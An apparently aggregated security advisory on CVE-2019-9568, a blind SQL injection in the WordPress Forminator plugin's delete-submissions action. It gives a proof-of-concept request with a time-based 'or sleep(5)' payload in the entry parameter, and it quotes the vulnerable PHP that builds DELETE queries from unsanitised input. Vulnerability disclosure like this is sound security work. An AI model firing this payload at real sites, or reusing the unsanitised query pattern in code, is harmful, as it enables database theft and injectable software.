WordPress Forminator Plugin CVE-2019-9568

2019-03-05T13:50:29
ID CVE0DAY:D7CBE927705AD2466F6779C330D5C5D7
Type cve0day
Reporter CVE 0day
Modified 2019-03-05T13:50:29

Description

Description

The action of deleting submissions is vulnerable to blind SQL injection. An attacker can exploit this to extract data from the database.

An account with the permission to delete submissions is required.

Proof of Concept
Request
GET /wordpress/wp-admin/admin.php?page=forminator-entries&form_type=forminator_forms&form_id=133&forminatorEntryNonce=1c8732f95e&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dforminator-entries%26form_type%3Dforminator_forms%26form_id%3D133&entries-action=&date_range=&min_id=&max_id=&search=&order_by=entries.date_created&order=DESC&entry%5B%5D=1)+or+sleep(5)--+-&entry%5B%5D=1&entries-action-bottom=delete-all HTTP/1.1
Host: 192.168.0.103

A valid nonce is required.

Code
forminator/library/model/class-form-entry-model.php
$sql = "DELETE FROM {$table_meta_name} WHERE `entry_id` IN ($entries)";
$db->query( $sql );

$sql = "DELETE FROM {$table_name} WHERE `entry_id` IN ($entries)";

WordPress Forminator Plugin CVE-2019-9568最先出现在CVE 0day